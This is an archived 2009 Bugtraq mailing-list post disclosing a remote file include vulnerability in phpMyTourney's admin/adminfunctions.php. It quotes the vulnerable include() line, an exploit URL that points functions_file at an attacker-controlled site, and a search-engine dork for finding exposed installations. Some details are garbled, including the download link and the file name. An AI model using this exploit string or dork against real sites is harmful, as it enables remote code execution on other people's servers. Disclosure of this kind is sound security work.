| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20090616140951.26161.qmail@securityfocus.com> Date: 16 Jun 2009 14:09:51 -0000 From: IrIsT.Ir@...il.Com To: bugtraq@...urityfocus.com Subject: phpMyTourney adminfunctions.php Remote File Include Vulnerabilities Hi a bug in phpMyTourney that allows to us to occur a Remote File Include on a Remote machin. Bug : ##################################################################################### # # # Islamic Republic Of Iran Security Team # # # # Www.IrIsT.Ir # # # ##################################################################################### # # # phpMyTourney adminfunctions.php Remote File Include Vulnerabilities # # # # Download......: http:/phpmytourney.sourceforge.net # # # # file; # # dminfunctions.php # # # # bug; # # # # include($functions_file); # # # # Exploit...: http://[site]/[path]/admin/adminfunctions.php?functions_file=[Site]? # # # ##################################################################################### # Bug Found.....: IrIsT™ # # # # discovery.....: Am!r (IrIsT™) # # # # contact.......: IrIsT.Ir[at]Gmail.Com # # # # Google Search.: "Powered By phpMyTourney" # # # #####################################################################################
Powered by blists - more mailing lists